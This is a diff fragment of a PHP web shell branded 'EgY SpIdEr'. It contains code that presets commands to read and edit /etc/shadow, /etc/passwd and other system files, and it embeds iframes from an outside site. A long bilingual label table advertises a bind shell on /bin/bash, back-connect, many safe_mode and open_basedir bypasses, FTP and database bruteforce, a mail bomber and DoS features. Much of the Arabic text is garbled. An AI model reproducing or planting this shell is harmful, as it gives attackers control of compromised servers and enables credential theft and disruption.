+if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
+else{print"<font color=olive><b>OFF</b></font>";} }
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>"; 
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
+
+
+ if(isset($_GET['egy']))
+ {
+ echo $head;
+ echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>';
+ $memf = @file("meminfo");
+ if($memf)
+ {
+ $c = sizeof($memf);
+ for($i=0;$i<$c;$i++)
+ {
+ $info = explode(":",$memf[$i]);
+ if($info[1]==""){ $info[1]="---"; }
+ $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+ }
+ echo $r;
+ }
+ else
+ {
+ echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center">
+ <font face="tahoma" size="-2"><b>
+ <p align="center">&nbsp;</p>
+ <p align="center">
+ <font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000">
+<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyspider.eu/ahmed/about.htm"></IFRAME></font></p>
+ <p align="center">&nbsp;</p>
+ <div id="n" align="center">
+ &nbsp;</div>
+ <p>&nbsp;</font></b></div>
+</b></font></div></td></tr>';
+ }
+ echo '</table>';
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+ die();
+ }
+ if(isset($_GET['news']))
+ {
+ echo $head;
+ echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>';
+ $memf = @file("meminfo");
+ if($memf)
+ {
+ $c = sizeof($memf);
+ for($i=0;$i<$c;$i++)
+ {
+ $info = explode(":",$memf[$i]);
+ if($info[1]==""){ $info[1]="---"; }
+ $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+ }
+ echo $r;
+ }
+ else
+ {
+ 
echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center">
+ <font face="tahoma" size="-2"><b>
+ <p align="center">&nbsp;</p>
+ <p align="center">
+ <font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000">
+<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyspider.eu/ahmed/news.htm"></IFRAME></font></p>
+ <p align="center">&nbsp;</p>
+ <div id="n" align="center">
+ &nbsp;</div>
+ <p>&nbsp;</font></b></div>
+</b></font></div></td></tr>';
+ }
+ echo '</table>';
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+ die();
+ }
+
+
+if(isset($_GET['5']))
+ {$_POST['cmd'] = 'systeminfo';}
+if(isset($_GET['6']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
+if(isset($_GET['7']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
+if(isset($_GET['8']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
+if(isset($_GET['9']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
+if(isset($_GET['10']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
+if(isset($_GET['13']))
+ {$_POST['cmd']='cat /proc/cpuinfo';}
+if(isset($_GET['14']))
+ {$_POST['cmd']='cat /proc/version';}
+if(isset($_GET['15']))
+ {$_POST['cmd'] = 'free';}
+if(isset($_GET['16']))
+ {$_POST['cmd'] = 'dmesg(8)';}
+if(isset($_GET['17']))
+ {$_POST['cmd'] = 'vmstat';}
+if(isset($_GET['18']))
+ {$_POST['cmd'] = 'lspci';}
+if(isset($_GET['19']))
+ {$_POST['cmd'] = 'lsdev';}
+if(isset($_GET['20']))
+ {$_POST['cmd']='cat /proc/interrupts';}
+if(isset($_GET['21']))
+ {$_POST['cmd'] = 'cat /etc/*realise';}
+if(isset($_GET['22']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
+if(isset($_GET['23']))
+ {$_POST['cmd'] = 'lsattr -va';}
+if(isset($_GET['24']))
+ {$_POST['cmd'] = 'w';}
+if(isset($_GET['25']))
+ {$_POST['cmd'] = 'who';}
+if(isset($_GET['26']))
+ {$_POST['cmd'] = 'uptime';} 
+if(isset($_GET['27'])) + {$_POST['cmd'] = 'last -n 10';} +if(isset($_GET['28'])) + {$_POST['cmd'] = 'ps -aux';} +if(isset($_GET['29'])) + {$_POST['cmd'] = 'service --status-all';} +if(isset($_GET['30'])) + {$_POST['cmd'] = 'ifconfig';} +if(isset($_GET['31'])) + {$_POST['cmd'] = 'netstat -a';} +if(isset($_GET['32'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';} +if(isset($_GET['33'])) + {$_POST['cmd'] = 'fdisk -l';} +if(isset($_GET['34'])) + {$_POST['cmd'] = 'df -h';} + +#if(isset($_GET[''])) +# {$_POST['cmd'] = '';} + +$lang=array( +'ar_text1' =>'الام?المنفذ', +'ar_text2' =>'تنفي?الاوام?في السيرف?, +'ar_text3' =>'ام?التشغي?, +'ar_text4' =>'مكان عملك الان عل?السيرف?, +'ar_text5' =>'رف?مل?ال?السيرف?, +'ar_text6' =>'مسار ملفك', +'ar_text7' =>'اوام?جاهز?, +'ar_text8' =>'اختر الام?, +'ar_butt1' =>'تنفي?, +'ar_butt2' =>'رفـع', +'ar_text9' =>'فت?بورت في السيرف?عل?/bin/bash', +'ar_text10'=>'بـور?, +'ar_text11'=>'باسورد للدخول', +'ar_butt3' =>'فت?, +'ar_text12'=>'أتصـال عـكس?, +'ar_text13'=>'الاي بي', +'ar_text14'=>'المنفذ', +'ar_butt4' =>'أتـصال', +'ar_text15'=>'سح?ملفا?ال?السيرف?, +'ar_text16'=>'عن طريق', +'ar_text17'=>'رابط المل?, +'ar_text18'=>'مكان نزول?, +'ar_text19'=>'Exploits', +'ar_text20'=>'إستخدم', +'ar_text21'=>'الاس?الجديد', +'ar_text22'=>'انبو?البيانات', +'ar_text23'=>'البورت المحلي', +'ar_text24'=>'السيرف?البعيد', +'ar_text25'=>'المنفذ البعيد', +'ar_text26'=>'استخدم', +'ar_butt5' =>'تشغي?, +'ar_text28'=>'العم?في الوض?الام?, +'ar_text29'=>'ممنو?الدخول', +'ar_butt6' =>'تغير', +'ar_text30'=>'عر?مل?, +'ar_butt7' =>'عر?, +'ar_text31'=>'المل?غي?موجو?, +'ar_text32'=>'تنفي?كو?php عن طريق داله eval', +'ar_text33'=>'Test bypass open_basedir with cURL functions', +'ar_butt8' =>'اختبار', +'ar_text34'=>'قرائ?الملفا?عن طريق ثغره include', +'ar_text35'=>'قرائ?الملفا?عن طريق ثغره Mysql', +'ar_text36'=>'القاعد?. 
الجدول', +'ar_text37'=>'اس?المستخدم', +'ar_text38'=>'كلمة المرور', +'ar_text39'=>'القاعد?, +'ar_text40'=>'نسخة من جداو?القاعد?, +'ar_butt9' =>'نسخة', +'ar_text41'=>'حف?النسخة في', +'ar_text42'=>'تعدي?الملفا?, +'ar_text43'=>'المل?المراد تعديله', +'ar_butt10'=>'حف?, +'ar_text44'=>'لاتستطيع التعدي?عل?هذ?المل?فق?تقرأ', +'ar_text45'=>'تم الحف?, +'ar_text46'=>'عر?phpinfo()', +'ar_text47'=>'رؤية المتغيرا?في php.ini', +'ar_text48'=>'مس?ملفا?ال?temp', +'ar_butt11'=>'تحري?المل?, +'ar_text49'=>'مس?السكرب?من السيرف?, +'ar_text50'=>'عر?معلوما?الذاكر?الرئيسية', +'ar_text51'=>'عر?معلوما?الذاكر?, +'ar_text52'=>'بح?نص', +'ar_text53'=>'في المسار', +'ar_text54'=>'بح?عن نص في الملفا?, +'ar_butt12'=>'بح?, +'ar_text55'=>'فق?في الملفا?, +'ar_text56'=>'لايوجد :(', +'ar_text57'=>'انشا?مس?مل?مجلد', +'ar_text58'=>'الاس?, +'ar_text59'=>'مل?, +'ar_text60'=>'مجلد', +'ar_butt13'=>'إنشا?/مس?, +'ar_text61'=>'تم إنشا?المل?, +'ar_text62'=>'تم إنشا?المجلد', +'ar_text63'=>'تم مس?المل?, +'ar_text64'=>'تم مس?المجلد', +'ar_butt65'=>'إنشا?, +'ar_text66'=>'مس?, +'ar_text67'=>'التصري?المستخدم/المجموعة', +'ar_text68'=>'ام?, +'ar_text69'=>'إس?المل?, +'ar_text70'=>'التصري?, +'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'ar_text72'=>'النص المراد', +'ar_text73'=>'بح?في المجلدات', +'ar_text74'=>'بح?في الملفا?, +'ar_text75'=>'* you can use regexp', +'ar_text76'=>'البح?عن نص في ملفا?بواسطه find', +'ar_text80'=>'النو?, +'ar_text81'=>'الإتصالا?, +'ar_text82'=>'قواع?البيانات', +'ar_text83'=>'تشغي?ام?استعلا?, +'ar_text84'=>'استعلا?قاعد?, +'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'ar_text86'=>'تنزي?ملفا?من السيرف?, +'ar_butt14'=>'تحمي?, +'ar_text87'=>'تنزي?ملفا?من خادم الاف تي بي', +'ar_text88'=>'سيرف?الاف تي بي:المنفذ', +'ar_text89'=>'مل?في الاف تي بي', +'ar_text90'=>'التحوي?ال?, +'ar_text91'=>'ارشف?, +'ar_text92'=>'من غي?الارشف?, +'ar_text93'=>'الاف تي بي', 
+'ar_text94'=>'تخمي?الاف تي بي', +'ar_text95'=>'قائم?المستخدمين', +'ar_text96'=>'لم يستط?سح?قائم?المستخدمين', +'ar_text97'=>'تم الفح? ', +'ar_text98'=>'تم بنجا? ', +'ar_text99'=>'* استخدم اسما?المستخدمين في مل?/etc/passwd لدخو?لل?ftp', +'ar_text100'=>'ارسا?مل?ال?خادم الاف تي بي', +'ar_text101'=>'استخدم الاسام?معكوسه لتخمينها', +'ar_text102'=>'خدما?البريد', +'ar_text103'=>'ارسا?بريد', +'ar_text104'=>'ارسا?مل?ال?الايمي?, +'ar_text105'=>'إل?, +'ar_text106'=>'مـ?, +'ar_text107'=>'الموضو?, +'ar_butt15'=>'إرسا?, +'ar_text108'=>'الرسال?, +'ar_text109'=>'مخفي', +'ar_text110'=>'عر?, +'ar_text111'=>'سيرف?قواع?البيانات : المنفذ', +'ar_text112'=>'قرائ?الملفا?عن طريق ثغرة داله mb_send_mail', +'ar_text113'=>'قرائ?محتو?المجلدات عن طريق via imap_list', +'ar_text114'=>'قرائ?الملفا?عن طريق ثغرة via imap_body', +'ar_text115'=>'قرائ?الملفا?عن طريق compress.zlib://', +'ar_text116'=>'نس?من', +'ar_text117'=>'ال?, +'ar_text118'=>'تم نس?المل?, +'ar_text119'=>'لايستطيع النس?, +'ar_err0'=>'خطاء ! لايمكن الكتاب?عل?هذ?المل?', +'ar_err1'=>'خطاء ! غي?قادر عل?قرائ?هذ?المل?', +'ar_err2'=>'خطاء! لايمكن الانشا?', +'ar_err3'=>'خطاء! غي?قادر عل?الاتصا?بالا?تي بي', +'ar_err4'=>'خطاء ! لاتستطيع الدخول ال?سيرف?الاف تي بي', +'ar_err5'=>'خطاء ! لاتستطيع تغير المجلد في الاف تي بي', +'ar_err6'=>'خطاء ! 
لاتستطيع ارسا?رسال?, +'ar_err7'=>'البريد ارسل', +'ar_text200'=>'copy()قرائ?الملفا?عن طريق ثغرة', +'ar_text202'=>'مسار المل?المراد قرائته', +'ar_text300'=>'curl()قرائ?الملفا?عن طريق ثغرة', +'ar_text203'=>'ini_restore()قرائ?الملفا?عن طريق ثغرة', +'ar_text204'=>'error_log()زراع?الملفا?عن طريق ثغره', +'ar_text205'=>'أزرع الشل عل?هذ?المسار', +'ar_text206'=>'قرائ?محتويا?المجلد', +'ar_text207'=>'قرائ?محتويا?المجلدات عن طريق ثغره reg_glob', +'ar_text208'=>'تنفي?الاوام?في الوض?الام?عن طريق الدوال', +'ar_text209'=>'قرائ?محتويا?المجلدات عن طريق ثغره root', +'ar_text210'=>'فك تشفي?الزن?', +'ar_text211'=>'::اقفا?السي?مو?:', +'ar_text212'=>'php.ini اقفا?السي?مو?عن طريق زر?مل?, +'ar_text213'=>'htacces إقفا?المو?سكيورت?عن طريق زر?مل?, +'ar_text214'=>'أس?الادمن', +'ar_text215'=>'عنوا?السيرف?IRC ', +'ar_text216'=>'# أس?الغرفه مع', +'ar_text217'=>'اس?السيرف?المختر?, +'ar_text218'=>'لإيقاف السي?مو?ini_restore زر?مل?يحتو?عل?ثغره', +'ar_text219'=>'سح?ملفا?ال?السيرف?وتغي?اسمه?بالوضع الام?, +'ar_text220'=>'استعرا?الملفا?عن طريق ثغره symlink الخطوه الاولى', +'ar_text221'=>'ضغ?الملفا?لتحميلها من الموقع(بع?تحميله?لجهازك غي?امتداد المل?لامتداده السابق)1', +'ar_text222'=>'استعرا?الملفا?عن طريق ثغره symlink الخطوه الثاني?, +'ar_text223'=>'قرائ?الملفا?عن طريق الدوال', +'ar_text224'=>'PLUGIN قرائ?الملفا?عن طريق ثغره ', +'ar_text143'=>'التم? 
', +'ar_text65'=>'انشا?, + + +'ar_text33'=>'تخطى السي?مو??open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'قرائ?الملفا?عن طريق ثغرة include function', +'ar_text35'=>'قرائ?الملفا?عن طريق ثغرة load file in mysql', +'ar_text85'=>'قرائ?الملفا?عن طريق ثغرة commands execute via MSSQL server', +'ar_text112'=>'قرائ?الملفا?عن طريق ثغرة function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'تخطى السي?مو??safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'تخطى السي?مو??safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'تخطى السي?مو??safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text116'=>'Copy from', +'ar_text117'=>'to', +'ar_text118'=>'File copied', +'ar_text119'=>'Cant copy file', +'ar_text120'=>'تخطى السي?مو??safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'تخطى السي?مو??open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'تخطى السي?مو??open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'تخطى السي?مو??open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'تخطى السي?مو??open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'تخطى السي?مو??open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'تخطى السي?مو??open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'تخطى السي?مو??open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'تخطى السي?مو??open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'تخطى السي?مو??open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'تخطى السي?مو??open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'تخطى السي?مو??open_basedir, create file via session_save_path(TMPDIR) (PHP <= 
5.2.4)', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text1' =>'Executed command', +'ar_text2' =>'Execute command on server', +'ar_text33'=>'تخطى السي?مو??open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'قرائ?الملفا?عن طريق ثغرة include function', +'ar_text35'=>'قرائ?الملفا?عن طريق ثغرة load file in mysql', +'ar_text112'=>'قرائ?الملفا?عن طريق ثغرة function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'تخطى السي?مو??safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'تخطى السي?مو??safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'تخطى السي?مو??safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text120'=>'تخطى السي?مو??safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'تخطى السي?مو??open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'تخطى السي?مو??open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'تخطى السي?مو??open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'تخطى السي?مو??open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'تخطى السي?مو??open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'تخطى السي?مو??open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'تخطى السي?مو??open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'تخطى السي?مو??open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'تخطى السي?مو??open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'تخطى السي?مو??open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'تخطى 
السي?مو??open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text142'=>'Downloaders', +'ar_text137'=>'Useful', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'تخطى السي?مو??open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'تخطى السي?مو??open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'تخطى السي?مو??open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'تخطى السي?مو??open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'تخطى السي?مو??open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text134'=>'Database-bruteforce', +'ar_text135'=>'Dictionary', +'ar_text136'=>'Creating evil symlink', +'ar_text137'=>'Useful', +'ar_text138'=>'Dangerous', +'ar_text139'=>'Mail Bomber', +'ar_text140'=>'DoS', +'ar_text141'=>'Danger! Web-daemon crash possible.', +'ar_text142'=>'Downloaders', +'ar_text143'=>'Temp: ', +'ar_text144'=>'قرائ?الملفا?عن طريق ثغرة load file in mysqli', +'ar_text145'=>'تخطى السي?مو??open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'ar_text146'=>'Max Interation', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_err0'=>'Error! Can\'t write in file ', +'ar_err1'=>'Error! Can\'t read file ', +'ar_err2'=>'Error! Can\'t create ', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text125'=>'Data', +'ar_text225'=>'زر?مل?لتلتخط?من خلال قاعد?البيانات ?4.4.7 / 5.2.3 PHP ', +'ar_text226'=>'تخطى السي?مو?بثغر?Root Directory: ', +'ar_text227'=>'زر?مل?لتخط?السف مو?بثغر?4.4.2/5.1.2', +'ar_text228'=>'زر?مل?لتخط?الحماي?لمنتدة الفى بى ', +'ar_text230'=>'زر?مل?لمعرفه كلما?المرور لمواقع السيرف?بدون تشفي?', +'ar_text151'=>'تخطى السي?مو?? chdir()and ftok() (PHP <= 5.2.6)', +'ar_text161'=>'تخطى السي?مو?? 
posix_access() (posix ext) (PHP <= 5.2.6)', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_text159'=>'معلوما?عن egy spider', +'ar_text152'=>'اخ?الاخبا?, +'ar_text153'=>'خروج ', +'ar_text154'=>'وض?اندك?سريع?', +'ar_text155'=>'حق?اكوا?', +'ar_text156'=>'عر?الكو?', +'ar_text157'=>'التسجي?فى الزو?ات?', +'ar_text158'=>'ادوا?التشفي? ', +'ar_text160'=>'الرئسي? ', +'ar_text162'=>'اقفا?الدوال وتخط?السي?مو?من خلال ionCube (PHP <= 5.2.4)', +'ar_text163'=>'تشغي?البيرل عل?السيرف?', +'ar_text170'=>' تخطى السي?مو?والدوا?? Posix_getpw(PHP <= 4.2.0)', +'ar_text171'=>' PHP (Win32std) Extension تخطى السي?مو?وتخط?الدوال (PHP <= 5.2.3)', +'ar_text180'=>'ارسل ملاحظاتك واتص?بى ', +/* --------------------------------------------------------------- */ +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS 
DENIED',
+'eng_text30'=>'Cat file',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from 
server',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without arch.',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'/etc/passwd',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu)',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access file (touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
+'eng_text136'=>'Creating evil symlink',
+'eng_text137'=>'Useful',
+'eng_text138'=>'Dangerous',
+'eng_text139'=>'Mail Bomber',
+'eng_text140'=>'DoS',
+'eng_text141'=>'Danger! Web-daemon crash possible.',
+'eng_text142'=>'Downloaders',
+'eng_text143'=>'Temp: ',
+'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
+'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
+'eng_text146'=>'Max Interation',
+'eng_text147'=>'',
+'eng_text148'=>'',
+'eng_text149'=>'',
+'eng_text150'=>'',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! 
Can\'t sent mail',
+'eng_err7'=>'Mail send',
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
